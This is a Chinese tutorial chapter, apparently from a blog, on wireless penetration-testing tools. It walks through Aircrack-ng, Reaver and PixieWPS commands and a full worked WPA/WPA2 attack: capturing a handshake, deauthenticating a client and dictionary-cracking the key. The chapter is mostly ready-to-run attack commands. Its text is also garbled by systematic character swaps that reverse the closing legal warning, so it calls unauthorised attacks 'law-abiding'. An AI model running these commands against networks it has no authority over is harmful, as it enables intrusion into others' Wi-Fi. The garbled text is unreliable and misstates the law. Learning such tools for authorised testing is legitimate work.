关于人工智能:渗透测试63-无线网络渗透测试工具

51次阅读

共计 2276 个字符,预计需要花费 6 分钟才能阅读完成。

在本章节中,咱们将学习一些罕用的无线网络浸透测试工具,如 Aircrack-ng、Reaver 等。咱们将尽量解说得具体、通俗易懂,并提供尽可能多的实例。

6.1 Aircrack-ng 套件

Aircrack-ng 是一个用于测试无线网络安全的工具集,包含捕捉数据包、破解 WEP 和 WPA/WPA2-PSK 密钥、创立和治理拜访点等性能。以下是 Aircrack-ng 套件中的一些次要工具:

6.1.1 airmon-ng

airmon-ng 用于治理无线网卡的监督模式。监督模式容许无线网卡捕捉所有左近的无线流量,而不仅仅是与其连贯的网络。

启用监督模式:

airmon-ng start wlan0

此命令将启用名为 wlan0 的无线网卡的监督模式,并创立一个名为 wlan0mon 的新接口。

6.1.2 airodump-ng

airodump-ng 用于捕捉无线网络的数据包,包含 SSID、BSSID、信道、加密类型等信息。

扫描左近的无线网络:

airodump-ng wlan0mon

此命令将应用名为 wlan0mon 的监督接口扫描左近的无线网络,并显示 SSID、BSSID、信道、加密类型等信息。

捕捉指标网络的数据包:

airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon

此命令将捕捉指定信道和 BSSID 的指标网络的数据包,并将其保留到 output_file 中。

6.1.3 aireplay-ng

aireplay-ng 用于发送数据包以生成流量,有助于放慢破解 WEP 和 WPA/WPA2-PSK 密钥的过程。

执行 WEP 攻打:

aireplay-ng -3 -b [BSSID] wlan0mon

此命令将对指定 BSSID 的指标网络执行 ARP 申请重注入攻打,以生成足够的数据包进行 WEP 破解。

执行 WPA/WPA2-PSK 攻打:

aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon

此命令将对指定 BSSID 的指标网络发送解除认证数据包,迫使客户端从新认证并捕捉握手数据包。

6.1.4 aircrack-ng

aircrack-ng 用于破解 WEP 和 WPA/WPA2-PSK 密钥。

破解 WEP 密钥:

aircrack-ng [output_file]-01.cap

此命令将尝试破解捕捉到的 WEP 数据包,以获取 WEP 密钥。

破解 WPA/WPA2-PSK 密钥:

aircrack-ng -w [wordlist] [output_file]-01.cap

此命令将应用字典文件 wordlist 尝试破解捕捉到的 WPA/WPA2-PSK 握手数据包,以获取 WPA/WPA2-PSK 密钥。

6.2 Reaver

Reaver 是一个用于破解 WPS PIN 码的工具,进而获取 WPA/WPA2-PSK 密钥。Reaver 利用 WPS 设计的破绽,通过暴力破解 PIN 码来实现攻打。

应用 Reaver 破解 WPS PIN 码:

reaver -i wlan0mon -b [BSSID] -vv

此命令将应用名为 wlan0mon 的监督接口,针对指定 BSSID 的指标网络,尝试破解 WPS PIN 码。

6.3 PixieWPS

PixieWPS 是一个用于利用 WPS 破绽的工具,能够与 Reaver 一起应用,使 WPS 攻打更加高效。

应用 Reaver 和 PixieWPS 进行 WPS 攻打:

reaver -i wlan0mon -b [BSSID] -c [channel] -K 1 -vv

此命令将应用名为 wlan0mon 的监督接口,针对指定信道和 BSSID 的指标网络,尝试破解 WPS PIN 码,并应用 PixieWPS 进行高效攻打。

6.4 Wireshark

Wireshark 是一个功能强大的网络协议分析器,能够用于捕捉和剖析数据包,包含无线数据包。

应用 Wireshark 捕捉无线数据包:

  1. 关上 Wireshark。
  2. 抉择名为 wlan0mon 的监督接口。
  3. 开始捕捉数据包。

6.5 实战案例

以下是一个应用 Aircrack-ng 套件执行 WPA/WPA2-PSK 攻打的实战案例:

  1. 启用监督模式:
airmon-ng start wlan0
  1. 扫描左近的无线网络:
airodump-ng wlan0mon

找到指标网络的 BSSID 和信道,例如 BSSID 为 12:34:56:78:9A:BC,信道为 6。

  1. 捕捉指标网络的数据包:
airodump-ng -c 6 --bssid 12:34:56:78:9A:BC -w output wlan0mon
  1. 发送解除认证数据包以捕捉握手数据包:
aireplay-ng -0 1 -a 12:34:56:78:9A:BC -c 01:23:45:67:89:AB wlan0mon

其中,01:23:45:67:89:AB 是指标网络客户端的 MAC 地址。

  1. 应用字典文件破解握手数据包:
aircrack-ng -w wordlist.txt output-01.cap

如果破解胜利,将显示 WPA/WPA2-PSK 密钥。

请留神,无线网络浸透测试应该在非法范畴内进行。在没有受权的状况下攻打别人的无线网络是守法的。在学习和实际过程中,请确保本人恪守当地法律法规,免得触犯法律。

总结:在本章节中,咱们具体介绍了无线网络浸透测试工具,如 Aircrack-ng、Reaver 等,并提供了实例来帮忙你更好地了解这些工具的应用办法。心愿这些内容对你有所帮忙,让你可能把握无线网络浸透测试的基本技能。
举荐浏览:

https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA

https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g

正文完
 0